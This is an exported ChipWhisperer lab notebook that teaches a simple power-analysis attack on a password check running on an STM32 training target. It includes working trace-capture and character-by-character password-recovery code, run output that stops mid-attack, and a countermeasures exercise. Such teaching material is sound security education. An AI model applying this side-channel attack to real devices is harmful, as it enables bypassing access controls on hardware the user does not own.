# Introduction 

This lab introduces passive attacks on embedded devices. The first topic gets you introduced to software and hardware tools that you will be using during labs and the second topic is an actual SPA attack against a simple verify PIN (access control). 

# Topic 1: Tools overview

This first topic will present the tools used during lab sessions.

These are:
* Jupyter notebooks
* ChipWhisperer acquisition and target

## Jupyter notebooks

Notebooks consist in cells, that contain either:
  - text formatted as [Markdown](https://commonmark.org/help/tutorial/index.html),
  - Python code

Keyboard shortcuts are:
  - `Ctrl+Enter` : execute current cell
  - `Shift+Enter` : execute current cell and go to next one,
  - `a` : add a new cell **before** current cell,
  - `b` : add a new cell **after** current cell,,
  - `y` : convert current cell to Python code,
  - `m` : convert current cell to text cell,
  - `d d` : suppress current cell.

## Matplotlib


The following cell shows how to plot 2 curves with an interactive plot (zoom is possible). Be sure to close the current plot (upper right button) before executing another plotting cell. 

---
📝**Plotting Note**

If using `matplotlib` for plotting, you might need to add a `plt.figure()` at the start to make a new figure. Otherwise you might find your plot ends up in the figure above! If you don't see the plots, sometimes a `plt.show()` is needed at the end.

---


In [1]:
%matplotlib notebook
import matplotlib.pylab as plt
plt.plot([1,2,2,4,5], 'r')
plt.plot([3,1,5,5,7], 'g')
plt.show()

<IPython.core.display.Javascript object>

# Chip Whisperer

## Connecting to device

The ChipWhisperer-Lite is a single-board device. It includes the capture hardware, along with a built in STM32F3 or XMEGA target. To use this target, simply plug in the device. 

You can define these values in the box below:

In [4]:
SCOPETYPE = 'OPENADC'
PLATFORM = 'CWLITEARM'
#CW_PATH = '../chipwhisperer/'
CW_PATH = '/home/vagrant/work/projects/chipwhisperer/'
SS_VER = 'SS_VER_1_1'

After this step, we can connect and configure the ChipWhisperer with the next cell.

Result should be:
> Serial baud rate = 38400  
> INFO: Found ChipWhisperer😍

If not, contact the teacher. 

In [76]:
setup_script = CW_PATH  + "jupyter/Setup_Scripts/Setup_Generic.ipynb"
%run $setup_script

Traceback (most recent call last):
  File "/home/vagrant/work/projects/chipwhisperer/software/chipwhisperer/hardware/naeusb/naeusb.py", line 300, in txrx
    self.usbdev().ctrl_transfer(payload[0], payload[1], payload[2], payload[3], payload[5:], timeout=self._timeout)
  File "/home/vagrant/.pyenv/versions/3.6.7/envs/cw/lib/python3.6/site-packages/pyusb-1.0.2-py3.6.egg/usb/core.py", line 1043, in ctrl_transfer
    self.__get_timeout(timeout))
  File "/home/vagrant/.pyenv/versions/3.6.7/envs/cw/lib/python3.6/site-packages/pyusb-1.0.2-py3.6.egg/usb/backend/libusb0.py", line 593, in ctrl_transfer
    timeout
  File "/home/vagrant/.pyenv/versions/3.6.7/envs/cw/lib/python3.6/site-packages/pyusb-1.0.2-py3.6.egg/usb/backend/libusb0.py", line 431, in _check
    raise USBError(errmsg, ret)
usb.core.USBError: [Errno None] b'error sending control message: No such device'


INFO: Caught exception on reconnecting to target - attempting to reconnect to scope first.
INFO: This is a work-around when USB has died without Python knowing. Ignore errors above this line.
Serial baud rate = 38400
INFO: Found ChipWhisperer😍


which from its documentation you can see does the following for the CWLite/CW1200:

    Sets the scope gain to 45dB
    Sets the scope to capture 5000 samples
    Sets the scope offset to 0 (aka it will begin capturing as soon as it is triggered)
    Sets the scope trigger to rising edge
    Outputs a 7.37MHz clock to the target on HS2
    Clocks the scope ADC at 4*7.37MHz. Note that this is synchronous to the target clock on HS2
    Assigns GPIO1 as serial RX
    Assigns GPIO2 as serial TX

And that's it! Your ChipWhisperer is now setup and ready to attack a target with basic settings for its scope. 

## Uploading Firmware

The next step in attacking a target is to get some firmware built and uploaded onto it. ChipWhisperer has built in support for STM32F* bootloaders : 

In [6]:
cw.program_target(scope, cw.programmers.STM32FProgrammer, "./simpleserial-glitch-CWLITEARM.hex")

Serial baud rate = 115200
Detected known STMF32: STM32F302xB(C)/303xB(C)
Extended erase (0x44), this can take ten seconds or more
Attempting to program 5275 bytes at 0x8000000
STM32F Programming flash...
STM32F Reading flash...
Verified flash OK, 5275 bytes
Serial baud rate = 38400


Upload the password firmware that is in the project folder.

## Sending commands
### Password 
You can try a password with the `p` command with a 5-character password with `target.simpleserial_write('p', pw)`

The resulting value is 1 (actually a `CWbytearray(b'01')`) if correct, 0 it not. 

Characters: abcdefghijklmnopqrstuvwxyz0123456789

In [129]:
pw = 'touch'.encode('ascii')
# send 'p' command with a pw password
target.simpleserial_write('p', pw)
# read value
val = target.simpleserial_read('r', 1)
print("Card returns: ", val)

Card returns:  CWbytearray(b'01')


In [130]:
val[0]

1

## Curve acquisition

The goal is to capture a power consumption trace during the command execution. The following cell does:

1. arm the scope so that it is ready to capture a trace,
2. sending a command, a trigger will be generated at the beggining of command execution and the power consumption trace will be recorded straigth after this trigger,
3. capture the scope result,
4. get the trace as an array.

The parameters that could be changed for the oscilloscope is the number of samples (i.e. duration of the acquisiton) and the gain. 

In [8]:
def get_trace(pwd, samples=2000):
    scope.adc.samples = samples # should be changed for exploration

    pw = pwd.encode('ascii')
    # get ready to trigger
    scope.arm()
    # send password + trigger (see code)
    target.simpleserial_write('p', pw)
    # get result 
    r = scope.capture()
    val = target.simpleserial_read_witherrors('r', 1, glitch_timeout=10)
    if r:
        print('Timeout happened during acquisition')
    return scope.get_last_trace()

trace = get_trace("00000")

In [9]:
# plot the trace
plt.figure()
plt.plot(trace)
plt.xlabel("Time (# sample number)")
plt.ylabel("Power Consumption")
plt.show()

<IPython.core.display.Javascript object>

### Plot 2 traces with 2 different password tries

In [10]:
trace1 = get_trace("00000", 2000)
trace2 = get_trace("cbcde", 2000)

plt.figure()
plt.plot(trace1)
plt.plot(trace2)
plt.xlabel("Time (# sample number)")
plt.ylabel("Power Consumption")
plt.show()

<IPython.core.display.Javascript object>

# Topic 2: Power Analysis for Password Bypass

---
NOTE: This lab references some (commercial) training material on [ChipWhisperer.io](https://www.ChipWhisperer.io). 

---

**SUMMARY:** *This tutorial will introduce you to breaking devices by determining when a device is performing certain operations. Our target device will be performing a simple password check, and we will demonstrate how to perform a basic power analysis.*

**LEARNING OUTCOMES:**

* How power can be used to determine timing information.
* Plotting multiple iterations while varying input data to find interesting locations.
* Using difference of waveforms to find interesting locations.
* Performing power captures with ChipWhisperer hardware 


## Power Trace Gathering

At this point you've got to insert code to perform the power trace capture. 
To make interacting with the hardware easier, let's define a function to attempt a password and return a power trace:


In [11]:
def cap_pass_trace(pwd):
    pw = pwd.encode('ascii')
    # get ready to trigger
    scope.arm()
    # send password + trigger (see code)
    target.simpleserial_write('p', pw)
    # get result 
    r = scope.capture()
    val = target.simpleserial_read_witherrors('r', 1, glitch_timeout=10)
    # return the captured trace 
    return scope.get_last_trace()

So what can we do with this? While first off - I'm going to cheat, and tell you that we have a preset password that starts with `c`, and it's 5 characters long. But that's the only hint so far - what can you do? While first off, let's try plotting a comparison of `c` to something else.


1. Try adding the plotting code and see what it looks like.
2. Send different passwords to the device. We're only going to look at the difference between a password starting with `c` and something else (anything else) right now.
3. Plot the different waveforms.

In [12]:
trace_0 = get_trace("01234", 3000)
trace_1 = get_trace("c1234", 3000)

print(trace_0)

%matplotlib notebook
plt.figure()
plt.plot(trace_0)
plt.plot(trace_1)
plt.xlabel("Time (# sample number)")
plt.ylabel("Power Consumption")
plt.show()

[ 0.06738281 -0.10546875 -0.07324219 ...  0.02539062  0.02246094
  0.01660156]


<IPython.core.display.Javascript object>

For reference, the output should look something like this:
<img src="img/spa_password_h_vs_0_overview.png" alt="SPA of Power Analysis" width="450"/>

If you are using the `%matplotlib notebook` magic, you can zoom in at the start. What you want to notice is there are two code paths taken, depending on a correct or incorrect path. Here for example is a correct & incorrect character processed:
<img src="img/spa_password_h_vs_0_zoomed.png" alt="SPA of Power Analysis" width="450"/>

OK interesting -- what's next? Let's plot every possible password character we could send.

Our password implementation only recognizes characters in the list `abcdefghijklmnopqrstuvwxyz0123456789`, so we're going to limit it to those valid characters for now.

Write some code in the following block that implements the following algorithm:

    for CHARACTER in LIST_OF_VALID_CHARACTERS:
        trace = cap_pass_trace(CHARACTER + "\n")
        plot(trace)
        
The above isn't quite valid code - so massage it into place! You also may notice the traces are way too long - you might want to make a more narrow plot that only does the first say **500 samples of the power trace**.



In [18]:
valid_char = "abcdefghijklmnopqrstuvwxyz0123456789"

%matplotlib notebook
plt.figure()
for character in valid_char:
    trace = get_trace(character + "0000", 500)
    plt.plot(trace)

<IPython.core.display.Javascript object>

The end result should be if you zoom in, you'll see there is a location where a single "outlier" trace doesn't follow the path of all the other traces. That is great news, since it means we learn something about the system from power analysis.

<img src="img/spa_password_list_char1.png" alt="SPA of Power Analysis against all inputs" width="450"/>

Using your loop - you can also try modifying the analysis to capture a correct "first" character, and then every other wrong second character. Do you see a difference you might be able to detect?

The pseudo-code would look something like this:

    for CHARACTER in LIST_OF_VALID_CHARACTERS:
        trace = cap_pass_trace("c" + CHARACTER + "\n")
        plot(trace)

Give that a shot in your earlier code-block, and then let's try and automate this attack to understand the data a little better.

In [37]:
%matplotlib notebook
plt.figure()

# We can find the next character in the PIN by taking the character corresponding to the shifted curve.
# If the new curves are identical we got the bad character.
for index, character in enumerate(valid_char):
    trace = get_trace("c" + character + "000", 500)  # cysec
    # we display part of the legend to identify the character corresponding to the colored curve
    if index > 20:
        plt.plot(trace)
    else:
        plt.plot(trace, label=character)
        

plt.legend()

<IPython.core.display.Javascript object>

<matplotlib.legend.Legend at 0x7f4c9a9b63c8>

## Automating an Attack against One Character

To start with - we're going to automate an attack against a **single** character of the password. Since we don't know the password (let's assume), we'll use a strategy of comparing all possible inputs together.

An easy way to do this might be to use something that we know can't be part of the valid password. As long as it's processed the same way, this will work just fine:

In [104]:
%matplotlib notebook
import matplotlib.pylab as plt

plt.figure()
ref_trace = cap_pass_trace("00000")[0:500]
plt.plot(ref_trace)
other_trace = cap_pass_trace("c0000")[0:500]
plt.plot(other_trace)

<IPython.core.display.Javascript object>

[<matplotlib.lines.Line2D at 0x7f4c9a2014a8>]

This will plot a trace with an input of "00000".

Let's make this a little more obvious, and plot the difference between a known reference & every other capture. You need to write some code that does something like this:

    ref_trace = cap_pass_trace( "00000")

    for CHARACTER in LIST_OF_VALID_CHARACTERS:
        trace = cap_pass_trace(CHARACTER + "\n")
        plot(trace - ref_trace)

Again, you may need to modify this a little bit such as adding code to make a new `figure()`. Also notice in the above example how I reduced the number of samples.


In [107]:
plt.figure()
for character in valid_char:
    trace = get_trace(character + "0000", 500)
    plt.plot(trace - ref_trace)

<IPython.core.display.Javascript object>

OK great - hopefully you now see one major "difference". It should look something like this:
    
<img src="img/spa_password_diffexample.png" alt="SPA with Difference" width="450"/>
    

What do do now? Let's make this thing automatically detect such a large difference. You may use `np.sum()` and `np.abs()` functions.


In [43]:
import numpy as np
np.abs([-1, -3, 1, -5, 6])

array([1, 3, 1, 5, 6])

In [44]:
np.sum(np.abs([-1, -3, 1, -5, 6]))

16

Taking your above loop, modify it to print an indicator of how closely this matches your trace. Something like the following should work:

    ref_trace = cap_pass_trace("00000")

    for CHARACTER in LIST_OF_VALID_CHARACTERS:
        trace = cap_pass_trace(CHARACTER + "\n")
        diff = SUM(ABS(trace - ref_trace))

        print("{:1} diff = {:2}".format(CHARACTER, diff))
        res[CHARACTER] = diff

In [97]:
def get_frequencies(found="", password_length=5):
    ref_trace = cap_pass_trace(found + "0" * (password_length - len(found)))
    res = {}
    for character in valid_char:
        trace = get_trace(found + character + "0" * (password_length - len(found) - 1), 500)
        diff = np.sum(np.abs(trace - ref_trace))
        # print("{:1} diff = {:2}".format(character, diff))

        res[character] = diff
        
    return res

res = get_frequencies(found="tou")
plt.figure()
plt.bar(range(len(res)), list(res.values()), align='center')
plt.xticks(range(len(res)), list(res.keys()))
plt.show()

<IPython.core.display.Javascript object>

Now you could bar-plot the dictionnary to observe the most probable character.

In [66]:
plt.figure()
plt.bar(range(len(res)), list(res.values()), align='center')
plt.xticks(range(len(res)), list(res.keys()))
plt.show()

<IPython.core.display.Javascript object>

Now the easy part - modify your above code to automatically print the correct password character. This should be done with a comparison of the `diff` variable - based on the printed characters, you should see one that is 'higher' than the others. Set a threshold somewhere reasonable (say I might use `25.0` based on one run).

In [91]:
def get_password_character(res):
    m = 25
    good_key = ""
    for key, value in res.items():
        print(key, value)
        if value > m:
            m = value
            good_key = key            
    
    print(f"Good key : {good_key}")
    return good_key

get_password_character(res)

a 1.001953125
b 0.81640625
c 26.30078125
d 1.2734375
e 1.34375
f 1.1396484375
g 1.08984375
h 1.2138671875
i 0.93359375
j 1.158203125
k 2.16796875
l 1.2880859375
m 1.599609375
n 1.421875
o 1.208984375
p 1.1298828125
q 1.2578125
r 0.994140625
s 1.0947265625
t 1.50390625
u 0.958984375
v 1.0439453125
w 1.220703125
x 1.1044921875
y 1.1201171875
z 1.43359375
0 1.072265625
1 0.9912109375
2 0.9140625
3 0.83203125
4 0.6826171875
5 1.02734375
6 0.80859375
7 1.1689453125
8 0.9208984375
9 1.1162109375
Good key : c


'c'

## Running a Full Attack

Finally - let's finish this off. Rather than attacking a single character, we need to attack each character in sequence.

If you go back to the plotting of differences, you can try using the correct first character & wrong second character. The basic idea is exactly the same as before, but now we loop through 5 times, and just build up the password based on brute-forcing each character.

Take a look at the following for the basic pseudo-code:

    guessed_pw = "" #Store guessed password so far
    
    do a loop 5 times (max password size):
        
        ref_trace = capture power trace(guessed_pw)
        res= dict()
        for CHARACTER in LIST_OF_VALID_CHARACTERS:
            trace = capture power trace (guessed_pw + CHARACTER)
            diff = SUM(ABS(trace - ref_trace))
            res[CHARACTER] = diff
        sort(res)
        guess_pw += ({res for highest diff}
            
         


In [131]:
def attack(password_length=5):
    guessed_pw = ""
    for i in range(password_length):
        res = get_frequencies(found=guessed_pw, password_length=password_length)
        guessed_pw += get_password_character(res)
    
    return guessed_pw
    
guessed_pw = attack()
print(guessed_pw)

if len(guessed_pw) == 4:
    for character in valid_char:
        pw = (guessed_pw + character).encode('ascii')
        # send 'p' command with a pw password
        target.simpleserial_write('p', pw)
        # read value
        val = target.simpleserial_read('r', 1)
        if val[0] == 1:
            print(f"Password = {guessed_pw + character}.")
            break

a 0.748046875
b 0.900390625
c 1.0634765625
d 1.072265625
e 0.96484375
f 0.859375
g 1.2138671875
h 0.76953125
i 0.83203125
j 0.7548828125
k 0.8603515625
l 0.8662109375
m 0.98046875
n 0.7021484375
o 1.01171875
p 0.8623046875
q 0.669921875
r 1.1513671875
s 1.31640625
t 1.62109375
u 1.9267578125
v 1.4453125
w 1.2041015625
x 1.55078125
y 0.7802734375
z 1.1171875
0 0.9931640625
1 1.0693359375
2 1.474609375
3 0.8544921875
4 0.7333984375
5 0.9658203125
6 1.2177734375
7 0.744140625
8 1.2236328125
9 1.361328125
Good key : 
a 1.21484375
b 1.5283203125
c 1.1240234375
d 0.9013671875
e 0.9248046875
f 1.0615234375
g 0.83984375
h 1.0478515625
i 1.306640625
j 1.2001953125
k 1.1708984375
l 0.984375
m 1.3173828125
n 1.107421875
o 1.0654296875
p 1.2421875
q 1.0654296875
r 0.7744140625
s 0.8984375
t 1.3203125
u 1.7763671875
v 1.021484375
w 1.185546875
x 1.1845703125
y 1.5
z 1.0029296875
0 0.89453125
1 1.287109375
2 1.328125
3 1.376953125
4 0.8310546875
5 0.9482421875
6 1.2109375
7 1.3779296875
8 0.78515625

You should get an output that looks like this:

    h
    h0
    h0p
    h0px
    h0px3 (or cysec?)

If so - 🥳🥳🥳🥳🥳🥳🥳🥳🥳🥳🥳🥳🥳 Congrats - you did it!!!!

If not - check some troubleshooting hints below. 

# Improving code

## Compilation

The following lines allow you to compile the software. 

In [116]:
%%bash -s "$CW_PATH"
cd $1/hardware/victims/firmware/simpleserial-glitch/
make PLATFORM=CWLITEARM CRYPTO_TARGET=NONE

SS_VER set to SS_VER_1_1
rm -f -- simpleserial-glitch-CWLITEARM.hex
rm -f -- simpleserial-glitch-CWLITEARM.eep
rm -f -- simpleserial-glitch-CWLITEARM.cof
rm -f -- simpleserial-glitch-CWLITEARM.elf
rm -f -- simpleserial-glitch-CWLITEARM.map
rm -f -- simpleserial-glitch-CWLITEARM.sym
rm -f -- simpleserial-glitch-CWLITEARM.lss
rm -f -- objdir/*.o
rm -f -- objdir/*.lst
rm -f -- simpleserial-glitch.s simpleserial.s stm32f3_hal.s stm32f3_hal_lowlevel.s stm32f3_sysmem.s
rm -f -- simpleserial-glitch.d simpleserial.d stm32f3_hal.d stm32f3_hal_lowlevel.d stm32f3_sysmem.d
rm -f -- simpleserial-glitch.i simpleserial.i stm32f3_hal.i stm32f3_hal_lowlevel.i stm32f3_sysmem.i
.
Welcome to another exciting ChipWhisperer target build!!
arm-none-eabi-gcc (15:5.4.1+svn241155-1) 5.4.1 20160919
Copyright (C) 2015 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

.
Compiling C: 

Then program with this newly compiled binary file.

In [117]:
cw.program_target(scope, cw.programmers.STM32FProgrammer, CW_PATH + "/hardware/victims/firmware/simpleserial-glitch/simpleserial-glitch-CWLITEARM.hex")

Serial baud rate = 115200
Detected known STMF32: STM32F302xB(C)/303xB(C)
Extended erase (0x44), this can take ten seconds or more
Attempting to program 5355 bytes at 0x8000000
STM32F Programming flash...
STM32F Reading flash...
Verified flash OK, 5355 bytes
Serial baud rate = 38400


# Countermeasures
1. Modify in the source file ```basic-passwdcheck.c ``` such that it is not possible to do the attack again. 
2. Launch the attack to prove it. 

For all the following questions, we advise to use the Jupyter file explorer. Go to this directory to edit and modify the source file: `CW_PATH/hardware/victims/firmware/basic-passwdcheck/`. There you will be able to edit, write and modify the souce file `basic-passwdcheck.c`.

In [None]:
# Remove the break in the loop

---
## Troubleshooting

Some common problems you might run into - first, if you get an output which keeps guessing the first character:

### Always get 'h'

    h
    hh
    hhh
    hhhh
    hhhhh

Check that when you run the `cap_pass_trace` inside the loop (checking the guessed password), are you updating the prefix of the password? For example, the old version of the code (guessing a single character) looked like this:

    trace = cap_pass_trace(c + "\n")

But that is always sending our first character only! So we need to send the "known good password so far". In the example code something like this:
   
    trace = cap_pass_trace(guessed_pw + c + "\n")

Where `guessed_pw` progressively grows with the known good start of the password.

### Always get 'a'

This looks like it's always matching the first character:

    h
    ha
    haa
    haaa
    haaaa

Check that you update the `ref_trace` - if you re-use the original reference trace, you won't be looking at a reference where the first N characters are good, and the remaining characters are bad. An easy way to do this is again using the `guessed_pw` variable and appending a null + newline:

    trace = cap_pass_trace(guessed_pw + "\x00\n")

---
<small>NO-FUN DISCLAIMER: This material is Copyright (C) NewAE Technology Inc., 2015-2020. ChipWhisperer is a trademark of NewAE Technology Inc., claimed in all jurisdictions, and registered in at least the United States of America, European Union, and Peoples Republic of China.

Tutorials derived from our open-source work must be released under the associated open-source license, and notice of the source must be *clearly displayed*. Only original copyright holders may license or authorize other distribution - while NewAE Technology Inc. holds the copyright for many tutorials, the github repository includes community contributions which we cannot license under special terms and **must** be maintained as an open-source release. Please contact us for special permissions (where possible).

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.</small>